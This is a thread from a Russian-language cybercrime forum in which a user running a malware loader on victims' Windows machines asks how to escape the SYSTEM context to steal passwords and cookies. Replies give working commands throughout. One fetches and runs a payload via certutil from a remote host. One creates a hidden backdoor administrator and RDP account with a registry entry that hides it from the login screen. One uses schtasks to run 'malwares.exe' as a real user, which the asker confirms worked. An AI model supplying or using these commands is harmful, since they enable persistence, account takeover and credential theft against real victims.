• XSS.stack #1 – первый литературный журнал от юзеров форума

Help with privilege

m3srine

RAID-массив
Пользователь
Регистрация
28.11.2021
Сообщения
50
Реакции
6
Гарант сделки
4
Депозит
0.0808 Ł
Hi
I hope someone can help
i am using a loader for windows install
All the connected client are with System privilege all client user names are system
unfortunately the grabbed password is empty
The remote screen is black
i need a solution to access to the real client computer
iattached a screenshot for the same client with username system and the real username
with rosen username i can control everything pass/screen/etc with user system i cant
i hope someone undrestand the situation
Thnk you
 

Вложения

  • 20240926_190943.jpg
    20240926_190943.jpg
    174.2 КБ · Просмотры: 35
  • 20240926_171213.jpg
    20240926_171213.jpg
    524.7 КБ · Просмотры: 36
Решение
You can create a task that runs with the user account of your choice and configure it to run without requiring a password.
edit:
schtasks /create /tn "YourTask" /tr "C:\Path\To\malwares.exe" /sc onstart /ru username /rl highest /f
schtasks /run /tn "YourTask"
Hello, It looks like you're using dcrat. Open the shell and run the command below. (with your malwares)
runas /user:TheActualUser "cmd.exe /c certutil.exe -urlcache -split -f \"http://<edited>/newfile.exe\" \"%TEMP%\newfile.exe\" && \"%TEMP%\newfile.exe\""
 
Последнее редактирование модератором:
Hello, It looks like you're using dcrat. Open the shell and run the command below. (with your malwares)
runas /user:TheActualUser "cmd.exe /c certutil.exe -urlcache -split -f \"http://<edited>/newfile.exe\" \"%TEMP%\newfile.exe\" && \"%TEMP%\newfile.exe\""
R u serious 😂😂
 
Guest

I hope it was a joke. But we can not understand it next time (I edited link).
 
The way you explained it sounds retarded are you trying to run your malwares as user instead of system i dont understand.
Never mind about the way just give a solution if u can
YEs when it run as system i cant do nothing no psswd no vnc no hvnc work
all the client with system prvlge are the same
 
If your malwares has remote shell capabilities then run your malware as a user via shell (cmd.exe).
Its ask for user account passwrd
Is there any solution to skip the password ??
 
Assuming you do not have the users credentials, so you can create an account.
net user username password /add
net user username /active:yes
net localgroup Administrators username /add
net localgroup "Remote Desktop Users" username /add
Edit: If you plan on establishing an rdp session with the client add the additional commands below.
net accounts /maxpwage:unlimited
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /f /d 0 /v username
 
Последнее редактирование:
Assuming you do not have the users credentials, so you can create an account.
net user username password /add
net user username /active:yes
net localgroup Administrators username /add
net localgroup "Remote Desktop Users" username /add
If i creat one it will be empty
Cuz its new
I need to run the exe on one of existing account that ha coockis psswrd history etc to grab them
 
You can create a task that runs with the user account of your choice and configure it to run without requiring a password.
edit:
schtasks /create /tn "YourTask" /tr "C:\Path\To\malwares.exe" /sc onstart /ru username /rl highest /f
schtasks /run /tn "YourTask"
 
Последнее редактирование:
Решение
Пожалуйста, обратите внимание, что пользователь заблокирован
Прекратить использовать крякнутый DCRAT, который сверкает от всего что есть в интернете и умер еще давным-давно. Посоветую перейти, пожалуй, на другой малварь.
 
You can create a task that runs with the user account of your choice and configure it to run without requiring a password.
edit:
schtasks /create /tn "YourTask" /tr "C:\Path\To\malwares.exe" /sc onstart /ru username /rl highest /f
schtasks /run /tn "YourTask"
WOrked and the problem is resolved
thank you for your time
Have nice day
 
Stop using the cracked DCRAT, which sparkles with everything on the Internet and died a long time ago. I would advise switching to another malware, perhaps.
Its not dc rat
Its private loader
Read before writing no sense answer
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх